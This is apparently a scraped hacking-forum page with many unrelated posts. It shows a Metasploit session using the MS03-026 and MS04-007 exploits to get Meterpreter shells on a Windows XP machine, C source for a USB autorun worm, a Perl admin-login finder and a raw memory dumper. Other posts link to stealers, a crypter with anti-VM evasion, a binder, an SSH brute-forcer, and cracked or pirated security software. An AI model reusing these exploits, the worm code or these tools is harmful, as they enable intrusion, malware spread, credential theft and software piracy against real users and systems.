Nytro

this is an old exploit but still works i have test it on Local Area Network here this exploit tested on Windows XP Service Pack 1 [o] DCOM RPC Exploit (ms03_026_dcom) # Description This module exploits a stack overflow in the RPCSS service, this vulnerability was originally found by the Last Stage of Delirium research group and has bee widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request root@ubuntu:~# ping 172.16.1.31 PING 172.16.1.31 (172.16.1.31) 56(84) bytes of data. 64 bytes from 172.16.1.31: icmp_seq=1 ttl=128 time=2.09 ms 64 bytes from 172.16.1.31: icmp_seq=2 ttl=128 time=0.335 ms 64 bytes from 172.16.1.31: icmp_seq=3 ttl=128 time=0.342 ms ^C --- 172.16.1.31 ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 2005ms rtt min/avg/max/mdev = 0.335/0.922/2.091/0.826 ms root@ubuntu:~# nmap -O -PN 172.16.1.31 Starting Nmap 4.62 ( http://nmap.org ) at 2009-06-21 09:56 WIT Interesting ports on ******-******.kapukvalley.net (172.16.1.31): Not shown: 1710 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 5000/tcp open upnp MAC Address: 00:1C:F0:5A:98:AF (D-Link) Device type: general purpose Running: Microsoft Windows 2000 OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1 Network Distance: 1 hop OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1.860 seconds root@ubuntu:~# cd /home/noge/pentest/metasploit/ root@ubuntu:/home/noge/pentest/metasploit# ./msfconsole | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ msf v3.3-dev + -- --=[ 378 exploits - 234 payloads + -- --=[ 20 encoders - 7 nops =[ 154 aux msf > use windows/dcerpc/ms03_026_dcom msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms03_026_dcom) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 135 yes The target port Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 4444 yes The local port RHOST no The target address Exploit target: Id Name -- ---- 0 Windows NT SP3-6a/2000/XP/2003 Universal msf exploit(ms03_026_dcom) > set RHOST 172.16.1.31 RHOST => 172.16.1.31 msf exploit(ms03_026_dcom) > set TARGET 0 TARGET => 0 msf exploit(ms03_026_dcom) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 172.16.1.31 yes The target address RPORT 135 yes The target port Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 4444 yes The local port RHOST 172.16.1.31 no The target address Exploit target: Id Name -- ---- 0 Windows NT SP3-6a/2000/XP/2003 Universal msf exploit(ms03_026_dcom) > exploit [*] Started bind handler [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ... [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ... [*] Sending exploit ... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] The DCERPC service did not reply to our request [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (172.16.1.12:38423 -> 172.16.1.31:4444) meterpreter > pwd C:\WINDOWS\system32 meterpreter > sysinfo Computer: ******-****** OS : Windows XP (Build 2600, Service Pack 1). meterpreter > ============================================================================================= ============================================================================================= [o] KILLBILL SMB Exploit (ms04_007_killbill) # Description This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encounted when using the equivalent bind payloads. Your mileage may vary. msf > use windows/smb/ms04_007_killbill msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms04_007_killbill) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- PROTO smb yes Which protocol to use: http or smb RHOST yes The target address RPORT 445 yes Set the SMB service port Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 4444 yes The local port RHOST no The target address Exploit target: Id Name -- ---- 0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1 msf exploit(ms04_007_killbill) > set RHOST 172.16.1.31 RHOST => 172.16.1.31 msf exploit(ms04_007_killbill) > show targets Exploit targets: Id Name -- ---- 0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1 msf exploit(ms04_007_killbill) > set TARGET 0 TARGET => 0 msf exploit(ms04_007_killbill) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- PROTO smb yes Which protocol to use: http or smb RHOST 172.16.1.31 yes The target address RPORT 445 yes Set the SMB service port Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 4444 yes The local port RHOST 172.16.1.31 no The target address Exploit target: Id Name -- ---- 0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1 msf exploit(ms04_007_killbill) > exploit [*] Started bind handler [*] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0) [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 3 opened (172.16.1.12:33484 -> 172.16.1.31:4444) meterpreter > sysinfo Computer: ******-****** OS : Windows XP (Build 2600, Service Pack 1). meterpreter > by matthews

Kaspersky Internet Security stops your PC being slowed down by cybercriminals and delivers unsurpassed on-line safety whilst protecting your files, music and photos from hackers : Keeps your money and identity safe Improved! Protects against bank account fraud Safeguards against online shopping threats Allows questionable applications and websites to be run in 'Safe Run Mode' New! Cybercriminals won’t hi-jack your PC Family protection from on-line predators Your files won’t be ruined by hackers Improved! Keeps your PC running smoothly Safer Wi-Fi connections Two way personal firewall Working keys till February 2010 Download: http://www.mediafire.com/download.php?edzmhto3juy

#include <windows.h> #include <stdio.h> int InfectDrives( ); int WriteINI( char* sINI, char* sFILE ); int ReadINI( char* sINI, char* sFILE ); int FileCopy( char* sNEW ); char* szFileName = "blah.exe"; int main() { int i = InfectDrives( ); printf( "drives infected: %i", i ); getchar( ); return 0; }; int InfectDrives( ) { char szBuffer[260]; char szInit[520], szFile[520]; int iCount = 0, iGet, iType; iGet = GetLogicalDriveStringsA( sizeof( szBuffer ), szBuffer ); if( iGet == 0 ) { return( 0 ); } char *szDrive = szBuffer; while( *szDrive ) { iType = GetDriveTypeA( szDrive ); sprintf( szInit, "%sautorun.inf", szDrive ); //craft inf sprintf( szFile, "%s%s", szDrive, szFileName ); //craft file if( iType == 2 ) //removable device { if( ReadINI( szInit, szFileName ) == 0 ) //check for infection { if( WriteINI( szInit, szFileName ) == 0 ) //infect { if( FileCopy( szFile ) == 0 ) //copy file { iCount++; } } } } szDrive = &szDrive[ strlen( szDrive ) + 1]; } return( iCount ); }; int WriteINI( char* sINI, char* sFILE ) { unsigned long bWrite = WritePrivateProfileString( "autorun", "open", sFILE, sINI ); if( bWrite == 0 ) { return( 1 ); } return( 0 ); }; int ReadINI( char* sINI, char* sFILE ) { char szBuffer[260]; unsigned long lRead = GetPrivateProfileString( "autorun", "open", NULL, szBuffer, sizeof( szBuffer ), sINI ); if( lRead != 0 ) { if( strstr( szBuffer, sFILE ) ) { return( 1 ); } } return( 0 ); }; int FileCopy( char* sNEW ) { char szBuffer[260]; GetModuleFileName( NULL, szBuffer, sizeof( szBuffer ) ); bool bCopy = CopyFile( szBuffer, sNEW, 0 ); if( bCopy == false ) { return( 1 ); } return( 0 ); }

#!/usr/bin/perl ## # By GlaDiaT0R # Admin Control Panel Finder ___ Version 1 # Home: Darkgh0st.com ## use HTTP::Request; use LWP::UserAgent; system('cls'); system('title Admin Control Panel Finder v1 final I[C]oded by Gladiator from H4ckCr3w.net'); print"\n"; print "-----------------------------------------------\n" ; print "[*]--Admin Control Panel Finder v 1 --------[*]\n" ; print "[*]-------------Coded By GlaDiaT0R----------[*]\n" ; print "[*]-------------From Darkgh0st.com---------[*]\n" ; print "[*]------------Greetz to Allah--------------[*]\n" ; print "*******************************************\n" ; print "\n"; print "~# enter site to scan\n* ex: www.domaine.com ou www.domaine.com/path\n-> "; $site=<STDIN>; chomp $site; print "\n"; print "~ Enter coding language of the website \n* ex: asp, php, cfm\n-> "; $code=<STDIN>; chomp($code); if ( $site !~ /^http:/ ) { $site = 'http://' . $site; } if ( $site !~ /\/$/ ) { $site = $site . '/'; } print "\n"; print "->Le site: $site\n"; print "->Source du site: $code\n"; print "->Scan de l'admin control panel en cours...\n\n\n"; if($code eq "asp"){ @path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp', 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp', 'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp', 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp', 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp', 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html', 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp', 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp', 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html' ); foreach $ways(@path1){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } } # ------------------------------------------------------- # -------------------test cfm ---------------------------| # ------------------------------------------------------- if($code eq "cfm"){ @path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm', 'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', 'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm', 'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm', 'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm', 'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm', 'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html', 'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm', 'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm', 'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html' ); foreach $ways(@path1){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } } # ------------------------------------------------------- #--------------------------/test-------------------------| # ------------------------------------------------------- if($code eq "php"){ @path2=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php', 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html', 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php', 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php', 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php', 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html', 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html', 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html', 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php', 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php', 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php', 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php' ); foreach $ways(@path2){ $final=$site.$ways; my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req); if($response->content =~ /Username/ || $response->content =~ /Password/ || $response->content =~ /username/ || $response->content =~ /password/ || $response->content =~ /USERNAME/ || $response->content =~ /PASSWORD/ || $response->content =~ /Senha/ || $response->content =~ /senha/ || $response->content =~ /Personal/ || $response->content =~ /Usuario/ || $response->content =~ /Clave/ || $response->content =~ /Usager/ || $response->content =~ /usager/ || $response->content =~ /Sing/ || $response->content =~ /passe/ || $response->content =~ /P\/W/ || $response->content =~ /Admin Password/ ){ print " \n [+] Found -> $final\n\n"; }else{ print "[-] Not Found <- $final\n"; } } kill("STOP",NULL); } ## # By GlaDiaT0R ##

/* A simple tool that allows you to dump all the physical memory (RAM) */ /* For more visit: http://vx.netlux.org/wargamevx */ /* greetz: undernet @ #eof-project,#virus and to non3x for the testing */ /* Tested on: 2.6.20-1.2320.fc5smp i686 athlon 2.6.22-gentoo-r5 i686 AMD Turion(tm) 64 X2 Mobile Technology TL-50 */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> void Printable(char *str,int size) { int lm = 0; while(lm < size) { if(isprint(str[lm])) printf("%c",str[lm]); lm++; } } main(int argc,char *argv[]) { int fd,only_print; unsigned char *buf = NULL; unsigned int addr,page_size = sysconf(_SC_PAGESIZE),tot_mem = page_size*sysconf(_SC_PHYS_PAGES); if(argv[1] == NULL) { printf("DumpRam v0.1 by [WarGame/DoomRiderz]\n"); printf("Usage: %s [option]\n",argv[0]); printf("option can be:\n"); printf("-p = only printable chars\n"); printf("-e = every byte\n"); exit(EXIT_FAILURE); } if(getuid( != 0) { printf("You must be root\n"); exit(EXIT_FAILURE); } if(strcmp(argv[1],"-p") == 0) only_print = 1; else if(strcmp(argv[1],"-e") == 0) only_print = 0; else { printf("Invalid option\n"); exit(EXIT_FAILURE); } fd = open("/dev/mem",O_RDONLY); if(fd < 0) { perror("/dev/mem"); exit(EXIT_FAILURE); } printf("\n\n\n\t** RAM size in Kb: %d\n",tot_mem/1024); printf("\t** Size of a page in bytes: %d\n\n\n\n\n",page_size); if((buf = malloc(page_size)) == NULL) { perror("malloc()"); exit(EXIT_FAILURE); } while(read(fd,buf,page_size) != -1) { if(only_print) Printable(buf,page_size); else write(0,buf,page_size); } close(fd); free(buf); }

Creating and using DLL Files by sunjester Using DLL files is to eliminate writing code over and over again. DLL's are often used for may things like file I/O. I will show you how to take the first two tutorials I've written in this section (read and writing text files) and put them both in a DLL file. Then, once the DLL is in our project I will show you how to use the read and write methods we placed inside the DLL. It's probably more feasible for .NET applications to utilize DLL's instead of rewriting so much code. C# and VB .NET applications are mostly used ("in the industry") for demo applications, or test applications for rapid application development. yes, c#, and VB.net are RAD languages just like the old VB6. 1. first, create a new project. Open the wizard and select "Class Library" and give it an appropriate name 2. here you can copy & Paste the code from the previous two tutorials, below is what mine looks like now. //sunjester //fusecurity.com using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.IO; using System.Collections; namespace FileIO { public class InputOutput { //writing to text files public void writeToFile(string fileName, string content) { StreamWriter write = new StreamWriter(fileName); write.Write(content); write.Close(); } //reading from text files public ArrayList Read(string fileName) { StreamReader read = new StreamReader(fileName); ArrayList lines = new ArrayList(); while (!read.EndOfStream) { lines.Add(read.ReadLine()); } read.Close(); return lines; } } } 3. now we can build the DLL, so in the menu select "Build" then "Build Solution". 4. next, let's go ahead and add another project to this one just in case we need to go back to the original DLL source and update it. 5. name it accordingly. 6. now we add the reference to our DLL file we just created. 7. and the final code. using System; using System.Collections.Generic; using System.Linq; using System.Text; using FileIO; using System.Collections; namespace UseFileIO2 { class Program { static void Main(string[] args) { InputOutput io = new InputOutput(); io.writeToFile("c:\\test44.txt", "here is some sample test data to write"); ArrayList lines = io.Read("c:\\test44.txt"); for (int i = 0; i < lines.Count; i++) { Console.WriteLine(lines[i]); } } } }

Demo: http://linkvn.info/checker/ Download: http://www.2shared.com/file/7080989/60eb434b/Rapid_Account_Checker.html

Download: http://www.2shared.com/file/7080970/9eafe720/File_Cloner_source.html

URL Dumper is an Online scanner written by flash in VB.NET in the last year.. Used too get XSS and SQL Injections vulns.. supports multi search engine, trash system, sqlite db to organize, etc.. Features: -Get all page links by advanced technique with regular expression; -XSS Scanner (auto check all page links); -SQLInjection Scanner (auto check all page links); -Multi-Thread engine; -Get many links by search (google/Yahoo/Live Search/Altavista/Terravista) -Search in the page source by regular expression; -View Source (Code/Browser); -Trash system -Database in SQLite to organize the URL’s -Enabled Proxy server -Etc.. Screen Shot: Binary: http://rapidshare.com/files/182933272/URL_Dumper_2.0_BIN.rar Source code: http://rapidshare.com/files/182933656/URL_Dumper_2.0_SRC.rar

Imi plac intrebarile, dar nu imi place designul.

Download: http://www.2shared.com/file/7066278/67a614e/SceneCoderz_Public_Stealer.html

Cate topicuri mai ai de gand sa reinvii?

Nowadays, there are far more threats out there than plain viruses. You have probably come across the term spyware as well, however, authors of malicious codes and dangerous websites are very innovative, and new kinds of threats emerge quite often, the vast majority of which are on the Internet. Here are some of the most common: · Exploit is a malicious code that takes advantage of a flaw or vulnerability in an operating system, Internet browser, or other essential program. · Social engineering is a common term for various techniques used to trick people into giving away their personal information (passwords, bank account details, credit card numbers etc.). A typical example of social engineering is phishing – an attempt to acquire sensitive personal data by shamming a trustworthy and well-known organization. Usually, the potential victims are contacted by a bulk e-mail asking them to e.g. update their bank account details. In order to do that, they are invited to follow the link provided which then leads to a fake website of the bank. · Scam can be also considered a kind of social engineering; it includes false job offers, or ones that will abuse the workers for illegal activities, summons to withdraw a large sum of money, fraudulent lotteries and the like. · Hoax is a bulk e-mail containing dangerous, alarming or just bothering and useless information. Many of the above threats use hoax e-mail messages to spread. Finally, malicious websites are ones that deliberately install malicious software on your computer, and hacked sites do just the same, only these are legitimate websites that have been compromised into infecting visitors. AVG LinkScanner is here to protect you from all these online threats. AVG LinkScanner is up and running immediately from the moment of installation. All basic settings have been pre-set by the manufacturer, so most of the time you will not have to worry about anything – just let AVG work in the background and protect you without any effort on your part. However, there might be situations where you need to adjust the program settings, or decide what to do with a virus infected file; this help system is here to provide detailed information and assist you with any task. Get AVG LinkScanner and enhance your online protection! Here are some key features of "AVG LinkScanner": · Search-Shield scans search results and places a safety rating next to each link, so you know where it’s safe to click. · Active Surf-Shield scans the page behind any link you click on or any web address you type into your browser. If the page is poisoned, it stops you from opening it. Reasons why this program is marked as adware: · Offers to install AVG Security Toolbar that the program does not require to fully function. Download: http://rapidshare.com/files/264761321/AVG-Linkscanner-8.5_337.rar

Please note this is 32 bit only! - m00n Built on the award-winning ThreatSense® engine, ESET NOD32 Antivirus software proactively detects and eliminates more viruses, trojans, worms, adware, spyware, phishing, rootkits and other Internet threats than any program available. It's the ideal antivirus for Windows XP, and also runs smoothly on Windows legacy systems, MS-DOS, file servers, mail servers, and more. No matter what your system, there is no better antivirus protection. ESET NOD32 Antivirus was awarded the "BEST Antivirus Solution" in 2006 and 2007 by AV-Comparatives. Compare antivirus solutions here to learn more, or check out the latest virus bulletin. ESET NOD32 Antivirus provides: * Proactive Protection: The award winning ThreatSense technology combines multiple layers of detection protecting you from Internet threats before it is too late. * Precise Detection: ESET accurately identifies known and unknown threats. It consistently wins top awards from testing labs and is recognized for having zero false positives. * Lightweight Design: Requires less memory and CPU power, allowing your computer to run fast, making more room for games, web browsing, and emailing. * Fast Scanning Speeds: Highly efficient program ensuring fast file scanning and product updates. It runs quietly in the background. 18.11 MB Download: Download: http://www.mediafire.com/?vzoyyzh4wzc

HIDE YOUR IP ADDRESS V1.0 Did you know your IP address is exposed every time you visit a website? Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Hide My IP allows you to surf anonymously, change your IP address, prevent identity theft, and guard against hacker intrusions, all with the click of a button. Key Benefits & Features Easily Conceal Your IP Address - Just click "Hide IP" and your IP is instantly hidden! Other people see a fake IP, which is not associated with your real IP. Click here to read how it works. Hie My IP 2009 Released January ??, 2009. Now with Secure 128-Bit Encrypted Connection, many new features, and more IPs! Anonymous Web Surfing - Protect your privacy and cover your tracks! Select from one of our many fake proxy IP addresses for totally anonymous browsing. Advanced Application Support - Hide My IP 2009 works with all major browsers and dozens of instant messengers, E-mail clients, games, and more! Protect Your Identity and Stop Hackers - Identity thieves can use your IP addresses to compromise your computer. Installing keyloggers, Trojans, and other tools to aid their crime. Stop them at the source by hiding your IP! Send Anonymous Emails - Hide your IP in E-mail headers. Supports Webmail services like Yahoo, Hotmail, and GMail. Mail clients supported with a Premium account include Outlook, Outlook Express, Eudora, and more! Un-ban Your IP From Forums, Blogs, and other Websites - By faking your IP you can often access many sites you were banned from. Use with Cookie Crumble for the most effectiveness. Instructions On How To Patch The Program: 1. Copy and paste the patch included in this download into the installation directory you installed the program in. The default location to find the directory is: C:\Program Files\Hide Your IP Address 2. Open the Patch and make sure 'Make Backup' is ticked. Click "patch" when ready. 3. Delete the patch from the directory once you have patched the program 4. Open Hide Your IP Address and a box will come up make sure you click Register. 5. Type in anything you want for Name, E-Mail and Serial Key boxes. Click register then OK 6. Restart Hide Your IP Address and you'll see its activated! What's Inside? Download: http://rapidshare.com/files/262261498/HideYourIP_v1.0_Admiral.rar

Registry RegDefense 2009 restores your computer to run like new. RegDefense prevents PC slow downs and crashes by cleaning up registry files and errors. It also repairs DLL’s and general system slowdowns that cause computer frustrations. RegDefense scans your computer and finds the problems with your computer and then fixes them so your computer runs like it did when you first took it out of the box. Features: • Registry Optimizer • Startup Manager • Backup / Restore Tools • Automatic Scheduler • 32 & 64 Bit Compatible • Tweak System Manager • In-Depth Scan • Fix Invalid File Paths • Fix Invalid Shortcuts • Fix Empty Registry Keys • Fix Invalid Class Keys • Fix Invalid Font Files • Fix User Settings • Increases Performance • Increases Computer Speed • Increases Disk Space • Increases Computer Life • Manage Shared Dll's • Customize Settings • Scan Result Manager • Automatic Updates • Automatic or Manual Fix • Visual Scan Process • Validate Startup Programs • Validate Active-X Objects • Prevent PC Freezeing • Prevent System Crashes • Registry Defrag System Requirements Minimum system requirements: 128 MB RAM 10 MB Hard drive space Supported operating system: Microsoft Windows Vista Microsoft Windows XP Microsoft Windows 2000 Download: http://rapidshare.com/files/263635390/Registry_Defense_v4.1.0.6_MUFIDIM_UPLOAD.rar

Tutorials... 1 : [+] Download 2 : [+] tar -zxvf [+]SSH Brutforcing.. by Max`s.tar 3 : [+] cd [+]SSH Brutforcing.. by Max`s 4 : [+] chmod +x * 5 : [+] ./scan ip.ip (ex ./scan 62.175) 6 : [+] Enjoy.... Programs use on Linux Download: hxxp://rapidshare.com/files/265000094/___SSH_Brutforcing.._by_Max_s.tar.html

Changes: New Design Icon Changer Anti VMWare Download: http://rapidshare.com/files/265002051/uNkCrypter_1.4.zip.html

Download: http://rapidshare.com/files/265012450/DelphBinder_Pro.rar.html

Download: http://www.2shared.com/file/7062953/20a9a2f2/StupidStealer.html

